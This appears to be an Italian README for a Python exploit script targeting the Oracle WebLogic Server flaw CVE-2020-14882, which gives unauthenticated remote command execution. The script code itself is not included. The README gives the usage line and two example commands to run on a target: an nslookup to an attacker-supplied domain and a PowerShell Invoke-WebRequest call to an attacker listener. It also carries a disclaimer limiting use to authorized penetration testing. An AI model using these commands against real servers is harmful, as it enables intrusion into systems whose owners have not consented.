
Questo script consente l'esecuzione di codice remoto (RCE) su Oracle WebLogic Server
Questo script consente l'esecuzione remota di codice (RCE) su Oracle WebLogic Server utilizzando una richiesta GET non autenticata. Sfrutta la vulnerabilità CVE-2020-14882. Eseguendo comandi arbitrari, un attaccante può ottenere accesso non autorizzato al server.
Assicurati di avere Python 3 installato. Per utilizzare questo script, segui i passaggi seguenti:
Apri un terminale o un prompt dei comandi.
Esegui lo script utilizzando il seguente comando:
python3 exploit.py http(s)://target:7001 command
Sostituisci http(s)://target:7001 con l'URL di destinazione del server Oracle WebLogic e command con il comando desiderato da eseguire.
Esempio 1:
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
Questo esempio esegue il comando nslookup your_Domain sul server di destinazione.
Esempio 2:
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
Questo esempio esegue il comando PowerShell Invoke-WebRequest -Uri http://your_listener sul server di destinazione.
Questo script è destinato esclusivamente a test di penetrazione autorizzati e a scopi di ricerca sulla sicurezza. L'uso non autorizzato di questo script per sfruttare sistemi senza il dovuto consenso è illegale e può comportare conseguenze legali. Utilizzalo a tuo rischio.
Questo script richiede le seguenti dipendenze:
requestsurllib3Assicurati che queste dipendenze siano installate prima di eseguire lo script.